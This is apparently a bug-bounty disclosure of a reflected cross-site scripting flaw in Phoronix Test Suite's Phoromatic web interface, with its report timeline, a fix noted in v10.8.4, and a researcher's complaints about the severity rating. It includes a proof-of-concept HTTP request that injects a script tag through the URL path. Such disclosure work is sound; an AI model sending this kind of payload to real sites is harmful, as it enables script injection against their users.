Cross-site Scripting ( XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Jun 23rd 2022

Description

Please enter a description of the vulnerability. File pts-core/phoromatic/public_html/public.php line 258 of public.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

Proof of Concept


GET /test"><script>alert(1)</script> HTTP/1.1
Host: localhost:8670
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=do8d0t932flbqqlmc9tj6hcjdk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache

// PoC.js
var payload = ...

Impact

web-interface https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/phoromatic/public_html/public.php

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago

We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago

A phoronix-test-suite/phoronix-test-suite maintainer modified the Severity from Critical to Low a year ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

A phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago

trongkykma has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

A phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in v10.8.4 with commit e4ff08 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

trongkykma

commented a year ago

Researcher

i am not understanding why i am not getting the bounty?

trongkykma

commented a year ago

Researcher

XSS error is not understood how you can rate it low ? @phoronix-test-suite

cvpa1k21

commented a year ago

It's just a XSS Reflected bug bro @trongkykma - You need to learn more about the effects of each type of XSS bro :)))))

cvpa1k21

commented a year ago

ưhat's up!!!!!

to join this conversation

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago

We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago

A phoronix-test-suite/phoronix-test-suite maintainer modified the Severity from Critical to Low a year ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

A phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago

trongkykma has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

A phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in v10.8.4 with commit e4ff08 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

trongkykma

commented a year ago

Researcher

i am not understanding why i am not getting the bounty?

trongkykma

commented a year ago

Researcher

XSS error is not understood how you can rate it low ? @phoronix-test-suite

cvpa1k21

commented a year ago

It's just a XSS Reflected bug bro @trongkykma - You need to learn more about the effects of each type of XSS bro :)))))

cvpa1k21

commented a year ago

ưhat's up!!!!!

to join this conversation